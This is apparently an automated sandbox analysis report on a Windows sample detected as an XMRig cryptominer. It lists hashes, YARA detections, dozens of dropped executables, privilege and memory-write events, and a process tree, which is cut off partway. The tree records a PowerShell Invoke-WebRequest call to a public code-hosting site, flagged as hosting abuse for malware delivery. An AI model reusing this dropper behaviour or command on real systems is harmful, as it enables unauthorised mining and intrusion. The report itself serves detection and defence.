xmrig | d44c7d9107889149e60fe196701559e0ba4c0cb794a464587bbcf6c283d574d7

Analysis

max time kernel
91s
max time network
134s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
08-06-2024 12:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
Size

3.2MB
MD5

af707a9427eb885b64363179ad56a320
SHA1

a52e00a455b4522bd565530bec58f787c6b099b4
SHA256

d44c7d9107889149e60fe196701559e0ba4c0cb794a464587bbcf6c283d574d7
SHA512

24450a608f43d76dd31d8a9a22e236a9256592921cb971625721369806d4c1b0456099c1f8ecbbe94a8f30df978ccee972588d1d764ad67d9645e38801cbabab
SSDEEP

98304:71ONtyBeSFkXV1etEKLlWUTOfeiRA2R76zHrWc:7bBeSFkQ

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral2/memory/1112-0-0x00007FF73F4F0000-0x00007FF73F8E6000-memory.dmp	xmrig
behavioral2/files/0x000a000000023423-5.dat	xmrig
behavioral2/files/0x000800000002342a-8.dat	xmrig
behavioral2/memory/1204-13-0x00007FF7D6300000-0x00007FF7D66F6000-memory.dmp	xmrig
behavioral2/files/0x000700000002342b-18.dat	xmrig
behavioral2/files/0x000700000002342d-27.dat	xmrig
behavioral2/files/0x0007000000023431-44.dat	xmrig
behavioral2/files/0x0007000000023432-56.dat	xmrig
behavioral2/files/0x000800000002342f-63.dat	xmrig
behavioral2/files/0x0007000000023436-87.dat	xmrig
behavioral2/files/0x0007000000023437-96.dat	xmrig
behavioral2/files/0x0007000000023438-101.dat	xmrig
behavioral2/files/0x000700000002343a-111.dat	xmrig
behavioral2/files/0x000700000002343c-121.dat	xmrig
behavioral2/files/0x0007000000023441-140.dat	xmrig
behavioral2/files/0x0007000000023442-153.dat	xmrig
behavioral2/files/0x0007000000023445-168.dat	xmrig
behavioral2/memory/2012-668-0x00007FF66EFD0000-0x00007FF66F3C6000-memory.dmp	xmrig
behavioral2/memory/3084-676-0x00007FF690430000-0x00007FF690826000-memory.dmp	xmrig
behavioral2/memory/2112-681-0x00007FF693470000-0x00007FF693866000-memory.dmp	xmrig
behavioral2/memory/4792-680-0x00007FF66E380000-0x00007FF66E776000-memory.dmp	xmrig
behavioral2/memory/936-695-0x00007FF6E57A0000-0x00007FF6E5B96000-memory.dmp	xmrig
behavioral2/memory/920-701-0x00007FF7A1A20000-0x00007FF7A1E16000-memory.dmp	xmrig
behavioral2/memory/2384-711-0x00007FF648F70000-0x00007FF649366000-memory.dmp	xmrig
behavioral2/memory/712-722-0x00007FF7BC1D0000-0x00007FF7BC5C6000-memory.dmp	xmrig
behavioral2/memory/4376-732-0x00007FF62E700000-0x00007FF62EAF6000-memory.dmp	xmrig
behavioral2/memory/4672-736-0x00007FF743870000-0x00007FF743C66000-memory.dmp	xmrig
behavioral2/memory/2408-741-0x00007FF655130000-0x00007FF655526000-memory.dmp	xmrig
behavioral2/memory/1220-740-0x00007FF6AAFD0000-0x00007FF6AB3C6000-memory.dmp	xmrig
behavioral2/memory/1684-729-0x00007FF618E90000-0x00007FF619286000-memory.dmp	xmrig
behavioral2/memory/4084-719-0x00007FF6406C0000-0x00007FF640AB6000-memory.dmp	xmrig
behavioral2/memory/2008-718-0x00007FF7F0780000-0x00007FF7F0B76000-memory.dmp	xmrig
behavioral2/memory/4104-710-0x00007FF665E10000-0x00007FF666206000-memory.dmp	xmrig
behavioral2/memory/5100-704-0x00007FF6A6330000-0x00007FF6A6726000-memory.dmp	xmrig
behavioral2/memory/404-690-0x00007FF77A0A0000-0x00007FF77A496000-memory.dmp	xmrig
behavioral2/memory/3944-685-0x00007FF760320000-0x00007FF760716000-memory.dmp	xmrig
behavioral2/files/0x0007000000023449-180.dat	xmrig
behavioral2/files/0x0007000000023447-178.dat	xmrig
behavioral2/files/0x0007000000023448-175.dat	xmrig
behavioral2/files/0x0007000000023446-173.dat	xmrig
behavioral2/files/0x0007000000023444-163.dat	xmrig
behavioral2/files/0x0007000000023443-158.dat	xmrig
behavioral2/files/0x0007000000023440-143.dat	xmrig
behavioral2/files/0x000700000002343f-138.dat	xmrig
behavioral2/files/0x000700000002343e-130.dat	xmrig
behavioral2/files/0x000700000002343d-126.dat	xmrig
behavioral2/files/0x000700000002343b-116.dat	xmrig
behavioral2/files/0x0007000000023439-106.dat	xmrig
behavioral2/files/0x0007000000023435-85.dat	xmrig
behavioral2/files/0x0007000000023434-81.dat	xmrig
behavioral2/files/0x0008000000023430-73.dat	xmrig
behavioral2/files/0x0007000000023433-69.dat	xmrig
behavioral2/memory/4240-50-0x00007FF7C8CC0000-0x00007FF7C90B6000-memory.dmp	xmrig
behavioral2/files/0x000700000002342e-52.dat	xmrig
behavioral2/memory/5052-45-0x00007FF79DD60000-0x00007FF79E156000-memory.dmp	xmrig
behavioral2/files/0x000700000002342c-35.dat	xmrig
behavioral2/memory/4108-28-0x00007FF65FAF0000-0x00007FF65FEE6000-memory.dmp	xmrig
behavioral2/memory/4488-14-0x00007FF6B1E90000-0x00007FF6B2286000-memory.dmp	xmrig
behavioral2/memory/1204-2089-0x00007FF7D6300000-0x00007FF7D66F6000-memory.dmp	xmrig
behavioral2/memory/5052-2091-0x00007FF79DD60000-0x00007FF79E156000-memory.dmp	xmrig
behavioral2/memory/4108-2093-0x00007FF65FAF0000-0x00007FF65FEE6000-memory.dmp	xmrig
behavioral2/memory/4240-2094-0x00007FF7C8CC0000-0x00007FF7C90B6000-memory.dmp	xmrig
behavioral2/memory/1204-2095-0x00007FF7D6300000-0x00007FF7D66F6000-memory.dmp	xmrig
behavioral2/memory/4488-2096-0x00007FF6B1E90000-0x00007FF6B2286000-memory.dmp	xmrig

Blocklisted process makes network request 7 IoCs

flow	pid	Process
9	4064	powershell.exe
11	4064	powershell.exe
16	4064	powershell.exe
17	4064	powershell.exe
21	4064	powershell.exe
27	4064	powershell.exe
29	4064	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
4064	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
1204	tXpemtI.exe
4488	dtnuSlD.exe
2012	CAruHWM.exe
4108	XVDPeND.exe
5052	NRkEmfb.exe
3084	CIdHOfV.exe
4240	coYPKaY.exe
2408	pkDBCbb.exe
4792	eGcGsdd.exe
2112	PebasYC.exe
3944	lmKpnNl.exe
404	ZRNfuMT.exe
936	JDqYDxr.exe
920	hMVFQJD.exe
5100	ZfqAukH.exe
4104	iMmZZLB.exe
2384	rsaKXOi.exe
2008	qflEkBs.exe
4084	tvmHrdW.exe
712	PDSupqK.exe
1684	csIMpaH.exe
4376	AwwaPwS.exe
4672	uSmMkUm.exe
1220	FFsXlBh.exe
1700	YUSmMot.exe
4844	fKgdAWB.exe
2316	wtXTVeH.exe
4156	QIuuhUI.exe
4116	HmKBioy.exe
3668	DQPpPXp.exe
1688	riQNMKo.exe
3504	rwRdBgQ.exe
2472	hFRFfDV.exe
4060	HBNPmMw.exe
1768	OMyFGOj.exe
428	JJeqPQO.exe
4584	IBxNVps.exe
2308	RTJtJUM.exe
536	vrZHmrY.exe
2420	IefJCBo.exe
5020	AzWHAbZ.exe
3160	YyLCKWF.exe
2032	tWrgquz.exe
4632	CzxQbKA.exe
5008	VtCcWbi.exe
388	zLbdbOR.exe
3552	nBJMibA.exe
4468	HydPRDa.exe
1548	aXNKtDu.exe
1520	hCCcHIX.exe
1136	HDQDFKi.exe
5036	EGxFkMZ.exe
2304	VGFkosc.exe
4936	VJPUPYf.exe
2648	xwgVfkM.exe
3308	dSDHjrm.exe
1760	kxStFnt.exe
2076	NUsPZvY.exe
3568	qqvEuOV.exe
1464	DDkNPDh.exe
816	ozlEPuF.exe
2068	lByVdvF.exe
956	glCpMsQ.exe
3580	OBJxWIW.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1112-0-0x00007FF73F4F0000-0x00007FF73F8E6000-memory.dmp	upx
behavioral2/files/0x000a000000023423-5.dat	upx
behavioral2/files/0x000800000002342a-8.dat	upx
behavioral2/memory/1204-13-0x00007FF7D6300000-0x00007FF7D66F6000-memory.dmp	upx
behavioral2/files/0x000700000002342b-18.dat	upx
behavioral2/files/0x000700000002342d-27.dat	upx
behavioral2/files/0x0007000000023431-44.dat	upx
behavioral2/files/0x0007000000023432-56.dat	upx
behavioral2/files/0x000800000002342f-63.dat	upx
behavioral2/files/0x0007000000023436-87.dat	upx
behavioral2/files/0x0007000000023437-96.dat	upx
behavioral2/files/0x0007000000023438-101.dat	upx
behavioral2/files/0x000700000002343a-111.dat	upx
behavioral2/files/0x000700000002343c-121.dat	upx
behavioral2/files/0x0007000000023441-140.dat	upx
behavioral2/files/0x0007000000023442-153.dat	upx
behavioral2/files/0x0007000000023445-168.dat	upx
behavioral2/memory/2012-668-0x00007FF66EFD0000-0x00007FF66F3C6000-memory.dmp	upx
behavioral2/memory/3084-676-0x00007FF690430000-0x00007FF690826000-memory.dmp	upx
behavioral2/memory/2112-681-0x00007FF693470000-0x00007FF693866000-memory.dmp	upx
behavioral2/memory/4792-680-0x00007FF66E380000-0x00007FF66E776000-memory.dmp	upx
behavioral2/memory/936-695-0x00007FF6E57A0000-0x00007FF6E5B96000-memory.dmp	upx
behavioral2/memory/920-701-0x00007FF7A1A20000-0x00007FF7A1E16000-memory.dmp	upx
behavioral2/memory/2384-711-0x00007FF648F70000-0x00007FF649366000-memory.dmp	upx
behavioral2/memory/712-722-0x00007FF7BC1D0000-0x00007FF7BC5C6000-memory.dmp	upx
behavioral2/memory/4376-732-0x00007FF62E700000-0x00007FF62EAF6000-memory.dmp	upx
behavioral2/memory/4672-736-0x00007FF743870000-0x00007FF743C66000-memory.dmp	upx
behavioral2/memory/2408-741-0x00007FF655130000-0x00007FF655526000-memory.dmp	upx
behavioral2/memory/1220-740-0x00007FF6AAFD0000-0x00007FF6AB3C6000-memory.dmp	upx
behavioral2/memory/1684-729-0x00007FF618E90000-0x00007FF619286000-memory.dmp	upx
behavioral2/memory/4084-719-0x00007FF6406C0000-0x00007FF640AB6000-memory.dmp	upx
behavioral2/memory/2008-718-0x00007FF7F0780000-0x00007FF7F0B76000-memory.dmp	upx
behavioral2/memory/4104-710-0x00007FF665E10000-0x00007FF666206000-memory.dmp	upx
behavioral2/memory/5100-704-0x00007FF6A6330000-0x00007FF6A6726000-memory.dmp	upx
behavioral2/memory/404-690-0x00007FF77A0A0000-0x00007FF77A496000-memory.dmp	upx
behavioral2/memory/3944-685-0x00007FF760320000-0x00007FF760716000-memory.dmp	upx
behavioral2/files/0x0007000000023449-180.dat	upx
behavioral2/files/0x0007000000023447-178.dat	upx
behavioral2/files/0x0007000000023448-175.dat	upx
behavioral2/files/0x0007000000023446-173.dat	upx
behavioral2/files/0x0007000000023444-163.dat	upx
behavioral2/files/0x0007000000023443-158.dat	upx
behavioral2/files/0x0007000000023440-143.dat	upx
behavioral2/files/0x000700000002343f-138.dat	upx
behavioral2/files/0x000700000002343e-130.dat	upx
behavioral2/files/0x000700000002343d-126.dat	upx
behavioral2/files/0x000700000002343b-116.dat	upx
behavioral2/files/0x0007000000023439-106.dat	upx
behavioral2/files/0x0007000000023435-85.dat	upx
behavioral2/files/0x0007000000023434-81.dat	upx
behavioral2/files/0x0008000000023430-73.dat	upx
behavioral2/files/0x0007000000023433-69.dat	upx
behavioral2/memory/4240-50-0x00007FF7C8CC0000-0x00007FF7C90B6000-memory.dmp	upx
behavioral2/files/0x000700000002342e-52.dat	upx
behavioral2/memory/5052-45-0x00007FF79DD60000-0x00007FF79E156000-memory.dmp	upx
behavioral2/files/0x000700000002342c-35.dat	upx
behavioral2/memory/4108-28-0x00007FF65FAF0000-0x00007FF65FEE6000-memory.dmp	upx
behavioral2/memory/4488-14-0x00007FF6B1E90000-0x00007FF6B2286000-memory.dmp	upx
behavioral2/memory/1204-2089-0x00007FF7D6300000-0x00007FF7D66F6000-memory.dmp	upx
behavioral2/memory/5052-2091-0x00007FF79DD60000-0x00007FF79E156000-memory.dmp	upx
behavioral2/memory/4108-2093-0x00007FF65FAF0000-0x00007FF65FEE6000-memory.dmp	upx
behavioral2/memory/4240-2094-0x00007FF7C8CC0000-0x00007FF7C90B6000-memory.dmp	upx
behavioral2/memory/1204-2095-0x00007FF7D6300000-0x00007FF7D66F6000-memory.dmp	upx
behavioral2/memory/4488-2096-0x00007FF6B1E90000-0x00007FF6B2286000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
8	raw.githubusercontent.com
9	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\UIrqivY.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\sIXwOSE.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\AwEemkj.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\bzELgiG.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\Ujgjkfu.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\vfPSfWs.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\mqbYaNH.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\Cgdbjnr.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\GPxquMf.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\FKqqZKs.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\vcNjofH.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\xJwNJok.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\yvGGxbY.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\icRdzyV.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\aEqDazN.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\hYOqJrk.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\YjtuBmE.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\dKQnvUk.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\YBxKPGC.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\ATUthza.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\BBdpItg.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\SnprNaa.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\jhaLmZz.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\VWVxJTZ.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\qqvEuOV.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\WZOsHiT.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\VCSzSEE.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\NUamnoj.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\cClfjiu.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\khpVjXi.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\KqavqeD.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\DZiOgBs.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\esTTsjP.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\MIOdCjx.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\rXADHQc.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\WshAsrp.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\InmXNDf.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\PfPlLNN.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\XqkPECc.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\AQATTwM.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\gnaMrhS.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\LjPcKPk.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\WyzSiAm.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\GSPdRRf.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\dCcmFLO.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\qISXVRN.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\TpRMmLO.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\EoiKLjs.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\ieLrGAm.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\xwnEAFf.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\ihCIcjQ.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\JDqYDxr.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\QeMyryB.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\OgCNGTt.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\wXzsQit.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\rBkvbMD.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\jliZJNZ.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\VYYJWmh.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\VRdzvfn.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\OOXGJqf.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\TGymIbo.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\JnPmIpM.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\PzRRTZm.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
File created	C:\Windows\System\lGQpOWU.exe	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4064	powershell.exe
4064	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4064	powershell.exe
Token: SeLockMemoryPrivilege	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
Token: SeLockMemoryPrivilege	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1112 wrote to memory of 4064	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	83
PID 1112 wrote to memory of 4064	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	83
PID 1112 wrote to memory of 1204	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	84
PID 1112 wrote to memory of 1204	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	84
PID 1112 wrote to memory of 4488	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	85
PID 1112 wrote to memory of 4488	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	85
PID 1112 wrote to memory of 2012	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	86
PID 1112 wrote to memory of 2012	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	86
PID 1112 wrote to memory of 4108	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	87
PID 1112 wrote to memory of 4108	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	87
PID 1112 wrote to memory of 5052	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	88
PID 1112 wrote to memory of 5052	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	88
PID 1112 wrote to memory of 3084	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	89
PID 1112 wrote to memory of 3084	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	89
PID 1112 wrote to memory of 4240	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	90
PID 1112 wrote to memory of 4240	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	90
PID 1112 wrote to memory of 2408	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	91
PID 1112 wrote to memory of 2408	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	91
PID 1112 wrote to memory of 4792	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	92
PID 1112 wrote to memory of 4792	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	92
PID 1112 wrote to memory of 2112	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	93
PID 1112 wrote to memory of 2112	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	93
PID 1112 wrote to memory of 3944	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	94
PID 1112 wrote to memory of 3944	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	94
PID 1112 wrote to memory of 404	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	95
PID 1112 wrote to memory of 404	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	95
PID 1112 wrote to memory of 936	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	96
PID 1112 wrote to memory of 936	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	96
PID 1112 wrote to memory of 920	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	97
PID 1112 wrote to memory of 920	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	97
PID 1112 wrote to memory of 5100	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	98
PID 1112 wrote to memory of 5100	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	98
PID 1112 wrote to memory of 4104	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	99
PID 1112 wrote to memory of 4104	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	99
PID 1112 wrote to memory of 2384	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	100
PID 1112 wrote to memory of 2384	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	100
PID 1112 wrote to memory of 2008	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	101
PID 1112 wrote to memory of 2008	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	101
PID 1112 wrote to memory of 4084	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	102
PID 1112 wrote to memory of 4084	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	102
PID 1112 wrote to memory of 712	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	103
PID 1112 wrote to memory of 712	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	103
PID 1112 wrote to memory of 1684	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	104
PID 1112 wrote to memory of 1684	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	104
PID 1112 wrote to memory of 4376	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	105
PID 1112 wrote to memory of 4376	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	105
PID 1112 wrote to memory of 4672	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	106
PID 1112 wrote to memory of 4672	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	106
PID 1112 wrote to memory of 1220	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	107
PID 1112 wrote to memory of 1220	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	107
PID 1112 wrote to memory of 1700	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	108
PID 1112 wrote to memory of 1700	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	108
PID 1112 wrote to memory of 4844	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	109
PID 1112 wrote to memory of 4844	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	109
PID 1112 wrote to memory of 2316	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	110
PID 1112 wrote to memory of 2316	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	110
PID 1112 wrote to memory of 4156	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	111
PID 1112 wrote to memory of 4156	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	111
PID 1112 wrote to memory of 4116	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	112
PID 1112 wrote to memory of 4116	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	112
PID 1112 wrote to memory of 3668	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	113
PID 1112 wrote to memory of 3668	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	113
PID 1112 wrote to memory of 1688	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	114
PID 1112 wrote to memory of 1688	1112	af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe	114

C:\Users\Admin\AppData\Local\Temp\af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\af707a9427eb885b64363179ad56a320_NeikiAnalytics.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1112
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4064
- C:\Windows\System\tXpemtI.exe
  C:\Windows\System\tXpemtI.exe
  2⤵
  - Executes dropped EXE
  PID:1204
- C:\Windows\System\dtnuSlD.exe
  C:\Windows\System\dtnuSlD.exe
  2⤵
  - Executes dropped EXE
  PID:4488
- C:\Windows\System\CAruHWM.exe
  C:\Windows\System\CAruHWM.exe
  2⤵
  - Executes dropped EXE
  PID:2012
- C:\Windows\System\XVDPeND.exe
  C:\Windows\System\XVDPeND.exe
  2⤵
  - Executes dropped EXE
  PID:4108
- C:\Windows\System\NRkEmfb.exe
  C:\Windows\System\NRkEmfb.exe
  2⤵
  - Executes dropped EXE
  PID:5052
- C:\Windows\System\CIdHOfV.exe
  C:\Windows\System\CIdHOfV.exe
  2⤵
  - Executes dropped EXE
  PID:3084
- C:\Windows\System\coYPKaY.exe
  C:\Windows\System\coYPKaY.exe
  2⤵
  - Executes dropped EXE
  PID:4240
- C:\Windows\System\pkDBCbb.exe
  C:\Windows\System\pkDBCbb.exe
  2⤵
  - Executes dropped EXE
  PID:2408
- C:\Windows\System\eGcGsdd.exe
  C:\Windows\System\eGcGsdd.exe
  2⤵
  - Executes dropped EXE
  PID:4792
- C:\Windows\System\PebasYC.exe
  C:\Windows\System\PebasYC.exe
  2⤵
  - Executes dropped EXE
  PID:2112
- C:\Windows\System\lmKpnNl.exe
  C:\Windows\System\lmKpnNl.exe
  2⤵
  - Executes dropped EXE
  PID:3944
- C:\Windows\System\ZRNfuMT.exe
  C:\Windows\System\ZRNfuMT.exe
  2⤵
  - Executes dropped EXE
  PID:404
- C:\Windows\System\JDqYDxr.exe
  C:\Windows\System\JDqYDxr.exe
  2⤵
  - Executes dropped EXE
  PID:936
- C:\Windows\System\hMVFQJD.exe
  C:\Windows\System\hMVFQJD.exe
  2⤵
  - Executes dropped EXE
  PID:920
- C:\Windows\System\ZfqAukH.exe
  C:\Windows\System\ZfqAukH.exe
  2⤵
  - Executes dropped EXE
  PID:5100
- C:\Windows\System\iMmZZLB.exe
  C:\Windows\System\iMmZZLB.exe
